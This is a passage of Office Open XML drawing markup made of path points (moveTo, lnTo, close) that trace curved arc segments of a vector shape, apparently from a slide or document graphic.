                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="1488097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="1535226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1582407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1629613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="1676793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="1723923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8191" y="1770964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="1817890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20485" y="1864677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28676" y="1911261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38239" y="1957628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49161" y="2003742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61455" y="2049576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75107" y="2095080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90131" y="2140229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106527" y="2184997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124282" y="2229332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143395" y="2273223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163880" y="2316607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185737" y="2359482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208953" y="2401786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233527" y="2443505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259486" y="2484590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298856" y="2444712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273405" y="2403043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="2360765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226745" y="2317902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205536" y="2274506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185750" y="2230602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167373" y="2186228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150406" y="2141423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134848" y="2096198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120713" y="2050618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107988" y="2004707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96672" y="1958505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86779" y="1912035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78295" y="1865337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71234" y="1818449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65570" y="1771408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61328" y="1724240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58508" y="1676984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57086" y="1629676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57086" y="1582343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58508" y="1535036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61328" y="1487779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65570" y="1440611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71234" y="1393571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78295" y="1346682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86779" y="1299984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96672" y="1253515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107988" y="1207312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120713" y="1161402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134848" y="1115822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150406" y="1070597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167373" y="1025791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185750" y="981417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205536" y="937514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226745" y="894118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="851255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273405" y="808977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298856" y="767295"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="1301648" y="2915374"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1254518" y="2904096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1208074" y="2891129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162342" y="2876537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1117358" y="2860344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1073137" y="2842577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1029728" y="2823260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987145" y="2802445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945451" y="2780157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904646" y="2756433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864781" y="2731300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825881" y="2704795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787984" y="2676944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751116" y="2647785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715302" y="2617343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680605" y="2585669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647026" y="2552776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614603" y="2518714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583374" y="2483497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553377" y="2447175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524637" y="2409774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497179" y="2371331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471055" y="2331859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446278" y="2291423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422884" y="2250033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400913" y="2207717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380403" y="2164537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361365" y="2120493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343852" y="2075637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327875" y="2030006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313486" y="1983613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300710" y="1936508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242468" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253288" y="1937575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265760" y="1985746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279869" y="2033193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295554" y="2079891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312813" y="2125815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331597" y="2170912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351866" y="2215159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373621" y="2258517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396798" y="2300973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421373" y="2342489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447332" y="2383028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474624" y="2422550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503224" y="2461031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533095" y="2498445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564222" y="2534755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596557" y="2569934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630085" y="2603944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="664756" y="2636748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700544" y="2668320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="737425" y="2698635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775360" y="2727642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814324" y="2755328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854290" y="2781655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="895210" y="2806598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937056" y="2830106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979817" y="2852166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023429" y="2872740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067892" y="2891790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1113155" y="2909290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1159192" y="2925203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1205979" y="2939504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1253464" y="2952153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301648" y="2963126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301648" y="2915374"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="1301648" y="247357"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1253464" y="258381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1205979" y="271068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1159192" y="285419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1113155" y="301383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067892" y="318935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023429" y="338048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979817" y="358673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937056" y="380796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="895210" y="404380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854290" y="429387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814324" y="455790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775360" y="483552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="737425" y="512648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700544" y="543039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="664756" y="574700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630085" y="607606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596557" y="641705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564222" y="676973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533095" y="713384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503224" y="750912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474624" y="789495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447332" y="829132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421373" y="869784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396798" y="911415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373621" y="953985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351866" y="997470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331597" y="1041844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312813" y="1087069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295554" y="1133106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279869" y="1179944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265760" y="1227531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253288" y="1275829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242468" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300710" y="1276908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313486" y="1229677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327875" y="1183157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343852" y="1137386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361365" y="1092415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380403" y="1048258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400913" y="1004951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422884" y="962520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446278" y="921016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471055" y="880465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497179" y="840892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524637" y="802335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553377" y="764819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583374" y="728395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614603" y="693089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647014" y="658926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680605" y="625944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715302" y="594169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751116" y="563651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787984" y="534403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825881" y="506476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864781" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904646" y="454672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945451" y="430885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987145" y="408533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1029728" y="387654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1073137" y="368287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1117358" y="350456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162342" y="334213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1208074" y="319570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1254518" y="306565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301648" y="295236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301648" y="247357"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="2446172" y="2948013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2406929" y="2908262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364752" y="2934716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321953" y="2959646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2278557" y="2983065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2234603" y="3004972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2190115" y="3025381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2145157" y="3044266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099741" y="3061639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053920" y="3077502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007717" y="3091865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1961184" y="3104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1914347" y="3116034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1867255" y="3125863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819935" y="3134169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772437" y="3140976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724787" y="3146260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677009" y="3150044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629168" y="3152305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581302" y="3153054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533423" y="3152305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485582" y="3150044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437805" y="3146260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390154" y="3140976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342656" y="3134169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295336" y="3125863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248244" y="3116034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201407" y="3104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154874" y="3091865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108671" y="3077502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062850" y="3061639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1017435" y="3044266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972477" y="3025381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927989" y="3004972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="884034" y="2983065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840638" y="2959646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797839" y="2934716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755675" y="2908262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716432" y="2948013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757948" y="2974949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800125" y="3000438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842911" y="3024454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="886269" y="3047022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="930160" y="3068129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974572" y="3087789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019441" y="3105988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1064742" y="3122726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110449" y="3138017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1156500" y="3151848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1202880" y="3164230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1249553" y="3175139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296479" y="3184601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343621" y="3192615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390942" y="3199168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438402" y="3204260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485976" y="3207905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533613" y="3210090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581302" y="3210814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1628978" y="3210090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1676615" y="3207905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724190" y="3204260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771650" y="3199168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1818970" y="3192615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866112" y="3184601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1913039" y="3175139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1959711" y="3164230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2006092" y="3151848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052142" y="3138017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097849" y="3122726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2143150" y="3105988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2188019" y="3087789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232431" y="3068129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276322" y="3047022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319680" y="3024454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2362466" y="3000438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404643" y="2974949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2446172" y="2948013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="2446172" y="263740"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2404643" y="236715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2362466" y="211150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319680" y="187032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276322" y="164388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232431" y="143192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2188019" y="123469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2143150" y="105206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097849" y="88404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052142" y="73063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2006092" y="59182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1959711" y="46761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1913039" y="35801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866112" y="26301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1818970" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771650" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724190" y="6578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1676615" y="2921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1628978" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533613" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485976" y="2921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438402" y="6578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390942" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343621" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296479" y="26301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1249553" y="35801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1202880" y="46761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1156500" y="59182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110449" y="73063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1064742" y="88404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019441" y="105206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974572" y="123469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="930160" y="143192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="886269" y="164388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842911" y="187032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800125" y="211150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757948" y="236715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716432" y="263740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755675" y="303745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797839" y="277202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840638" y="252171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="884034" y="228663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927989" y="206667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972477" y="186194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1017435" y="167233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062850" y="149783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108671" y="133858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154874" y="119443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201407" y="106553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248244" y="95173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295336" y="85318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342656" y="76974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390154" y="70142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437805" y="64833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485582" y="61036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533423" y="58762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581289" y="58013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629168" y="58762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677009" y="61036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724787" y="64833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772437" y="70142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819935" y="76974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1867255" y="85318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1914347" y="95173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1961184" y="106553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007717" y="119443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053920" y="133858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099741" y="149783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2145157" y="167233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2190115" y="186194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2234603" y="206667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2278557" y="228663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321953" y="252171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364752" y="277202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406929" y="303745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2446172" y="263740"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="2917088" y="1888705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2869971" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2858820" y="1936508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846019" y="1983613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2831617" y="2030006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2815615" y="2075637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2798076" y="2120493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2779014" y="2164537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758452" y="2207717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736456" y="2250033"/>
